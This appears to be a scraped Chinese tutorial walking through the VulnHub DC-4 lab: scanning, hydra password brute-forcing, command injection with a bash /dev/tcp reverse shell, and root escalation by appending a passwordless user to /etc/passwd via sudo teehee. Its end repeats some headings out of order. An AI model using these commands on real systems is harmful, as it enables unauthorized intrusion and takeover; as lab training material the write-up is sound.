DC-4 靶机渗透测试详细教学文档<\/h1>

一、环境准备<\/h2>

靶机信息<\/h3>

靶机名称: DC-4<\/li>
下载地址: https:\/\/vulnhub.com\/entry\/dc-4,313\/<\/li>

网络配置: 攻击机和靶机在同一局域网(192.168.44.0\/24)<\/li> <\/ul>

攻击机配置<\/h3>

IP地址: 192.168.44.133<\/li>

推荐工具: Kali Linux<\/li> <\/ul>

靶机配置<\/h3>

IP地址: 192.168.44.136<\/li> <\/ul>

二、信息收集阶段<\/h2>

1. 主机发现<\/h3>

使用以下命令确定靶机IP:<\/p>

# 使用nmap进行主机发现<\/span>
<\/span><\/span>nmap -sn 192.168.44.0\/24
<\/span><\/span>
<\/span><\/span># 或者使用arp-scan<\/span>
<\/span><\/span>arp-scan -I eth0 -l
<\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3>
对发现的靶机IP进行详细端口扫描:<\/p>
nmap -sV -p- 192.168.44.136
<\/span><\/span><\/code><\/pre>扫描结果分析<\/strong>:<\/p>

80端口: HTTP服务(可能是Web应用)<\/li>
SSH端口: 22端口开放<\/li>
<\/ul>
3. Web目录扫描<\/h3>
使用工具如dirb、gobuster或dirsearch进行目录扫描:<\/p>
gobuster dir -u http:\/\/192.168.44.136 -w \/usr\/share\/wordlists\/dirb\/common.txt
<\/span><\/span><\/code><\/pre>扫描结果<\/strong>: 目录结构很干净，没有发现明显的敏感目录或文件<\/p>
三、Web应用渗透测试<\/h2>
1. 登录框测试<\/h3>
发现Web应用只有一个登录框，进行以下测试:<\/p>
SQL注入测试<\/h4>
尝试常见SQL注入payload:<\/p>

admin' OR '1'='1<\/code><\/li>
admin' -- <\/code><\/li>
admin' \/*<\/code><\/li>
<\/ul>
结果<\/strong>: SQL注入尝试失败<\/p>
暴力破解<\/h4>
使用不同字典进行密码爆破:<\/p>

首先尝试小字典(16kB)<\/li>
<\/ol>
hydra -l admin -P small_wordlist.txt 192.168.44.136 http-post-form "\/login.php:username=^USER^&password=^PASS^:Invalid"<\/span>
<\/span><\/span><\/code><\/pre>
小字典失败后，使用大字典(10万密码)<\/li>
<\/ol>
hydra -l admin -P large_wordlist.txt 192.168.44.136 http-post-form "\/login.php:username=^USER^&password=^PASS^:Invalid"<\/span>
<\/span><\/span><\/code><\/pre>成功结果<\/strong>: 爆破成功，密码为"happy"<\/p>
2. 命令执行漏洞利用<\/h3>
登录后发现命令执行功能:<\/p>

测试命令执行:

前端输入命令如"ls"，观察响应<\/li>
使用Burp Suite拦截请求，修改命令参数为"whoami"<\/li>
<\/ul>
<\/li>
<\/ol>
验证<\/strong>: 确认存在命令注入漏洞，可以执行任意系统命令<\/p>

获取反向shell:<\/li>
<\/ol>
# 在攻击机监听<\/span>
<\/span><\/span>nc -lvnp 4444<\/span>
<\/span><\/span>
<\/span><\/span># 在命令执行处输入<\/span>
<\/span><\/span>bash -i >& \/dev\/tcp\/192.168.44.133\/4444 0>&1<\/span>
<\/span><\/span><\/code><\/pre>四、权限提升阶段1<\/h2>
1. 寻找SSH凭证<\/h3>

在系统中搜索敏感文件:<\/li>
<\/ol>
find \/ -name "id_rsa"<\/span> 2>\/dev\/null
<\/span><\/span>find \/ -name "*.bak"<\/span> 2>\/dev\/null
<\/span><\/span><\/code><\/pre>
发现备份文件:<\/li>
<\/ol>
\/home\/jim\/backups\/old-passwords.bak
<\/span><\/span><\/code><\/pre>2. SSH暴力破解<\/h3>
使用发现的密码列表爆破jim用户的SSH:<\/p>
hydra -l jim -P old-passwords.bak ssh:\/\/192.168.44.136
<\/span><\/span><\/code><\/pre>成功结果<\/strong>: 爆破成功，获得jim用户SSH访问权限<\/p>
五、权限提升阶段2<\/h2>
1. 横向移动<\/h3>

检查邮件:<\/li>
<\/ol>
cat \/var\/mail\/jim
<\/span><\/span><\/code><\/pre>

发现charles用户发送的邮件，包含密码<\/p>
<\/li>

切换用户:<\/p>
<\/li>
<\/ol>
su charles
<\/span><\/span># 输入邮件中的密码<\/span>
<\/span><\/span><\/code><\/pre>2. 最终提权<\/h3>
发现charles可以使用teehee编辑器:<\/p>

检查sudo权限:<\/li>
<\/ol>
sudo -l
<\/span><\/span><\/code><\/pre>
利用teehee提权方法:<\/li>
<\/ol>
# 方法1: 添加root用户到\/etc\/passwd<\/span>
<\/span><\/span>echo "root2::0:0:root:\/root:\/bin\/bash"<\/span> | sudo teehee -a \/etc\/passwd
<\/span><\/span>su root2
<\/span><\/span># 无需密码即可获得root shell<\/span>
<\/span><\/span>
<\/span><\/span># 方法2: 写入SSH公钥<\/span>
<\/span><\/span>mkdir -p \/root\/.ssh
<\/span><\/span>echo "ssh-rsa AAAAB3NzaC1y..."<\/span> | sudo teehee -a \/root\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>
成功获取root权限<\/li>
<\/ol>
六、获取flag<\/h2>
在root目录下查找flag文件:<\/p>
find \/ -name "*flag*"<\/span> 2>\/dev\/null
<\/span><\/span>cat \/root\/flag.txt
<\/span><\/span><\/code><\/pre>七、总结与关键点<\/h2>


关键渗透路径<\/strong>:<\/p>

Web登录爆破 → 命令注入 → SSH凭证发现 → SSH爆破 → 邮件密码泄露 → teehee提权<\/li>
<\/ul>
<\/li>

学习要点<\/strong>:<\/p>

不要忽视简单的密码爆破<\/li>
命令注入漏洞的识别与利用<\/li>
系统内部信息收集的重要性(邮件、备份文件)<\/li>
非常规提权方法(teehee编辑器)<\/li>
<\/ul>
<\/li>

防御建议<\/strong>:<\/p>

使用强密码策略<\/li>
限制命令执行功能<\/li>
定期检查系统备份文件<\/li>
监控sudo权限配置<\/li>
及时更新有潜在危险的setuid程序<\/li>
<\/ul>
<\/li>
<\/ol>

DC-4 靶机渗透测试详细教学文档<\/h1>

一、环境准备<\/h2>

二、信息收集阶段<\/h2>

1. 登录框测试<\/h3> 发现Web应用只有一个登录框，进行以下测试:<\/p>

四、权限提升阶段1<\/h2>

1. 登录框测试<\/h3>
发现Web应用只有一个登录框，进行以下测试:<\/p>